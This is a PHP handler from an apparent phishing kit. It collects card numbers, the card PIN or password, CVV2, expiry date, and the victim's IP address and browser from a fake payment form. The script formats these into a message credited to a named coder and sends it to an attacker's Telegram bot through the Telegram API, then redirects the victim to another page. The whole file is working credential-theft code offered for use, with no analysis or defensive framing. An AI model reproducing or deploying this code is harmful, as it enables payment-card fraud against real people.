<?php
$e = htmlentities(strip_tags(htmlentities($_POST['e'])));
error_reporting(0);
include "info.php";
$ip = $_SERVER["REMOTE_ADDR"];
$browser = $_SERVER['HTTP_USER_AGENT'];

  $cards = htmlentities(strip_tags(htmlentities($_POST['card1'])));
  $cardss = htmlentities(strip_tags(htmlentities($_POST['card2'])));
  $cardsss = htmlentities(strip_tags(htmlentities($_POST['card3'])));
  $cardssss = htmlentities(strip_tags(htmlentities($_POST['card4'])));
  $pass = htmlentities(strip_tags(htmlentities($_POST['pass'])));
  $cvv = htmlentities(strip_tags(htmlentities($_POST['cvv2'])));
  $mah = htmlentities(strip_tags(htmlentities($_POST['month'])));
  $sal = htmlentities(strip_tags(htmlentities($_POST['year'])));

$string_2 = substr($cardss, 0, -2);
$card = $cards . " " . $cardss . " " . $cardsss . " " . $cardssss; 
htmlentities($card);
$pan = "$cards$cardss$cardsss$cardssss";

$textmsg = "
╔⚠️Nᴇᴡ #OTP Rʀᴇᴄᴇɪᴠᴇᴅ  
╠════════════
╠ 📩Cᴀʀᴅ Iɴғᴏʀᴍᴀᴛɪᴏɴ
║
╠🌇Cᴀʀᴅ ➣ <code>$cards $cardss $cardsss $cardssss</code>
╠🎑Pᴀss ➣ <code>$pass</code>
╠🌠Cᴠᴠ2 ➣ <code>$cvv</code>
╠🌃Dᴀᴛᴇ ➣ <code>$sal</code> : <code>$mah</code>
╠════════════
╠ 🎉Hᴏʟᴅᴇʀ Iɴғᴏʀᴍᴀᴛɪᴏɴ
║
╠🌿iᴘ ➣ <code>$ip</code>
║
╠🎢Bʀᴏᴡsᴇʀ : <code>$browser</code>
║
╠🩸Cᴏᴅᴇʀ ➣ @X405U7 🍉
╠════════════
";
$textmsg .="\n$bankinfo[0]";
if(isset($cards) and isset($pass) and isset($cvv) and isset($sal) and isset($mah)){
$send1 = file_get_contents("https://api.telegram.org/bot$TOKEN/SendMessage?chat_id=$ID&parse_mode=html&text=".urlencode($textmsg));
}else{
  echo "خی خی";
}

?>
<meta content='0;url=ip.php' http-equiv='refresh'/>
/>
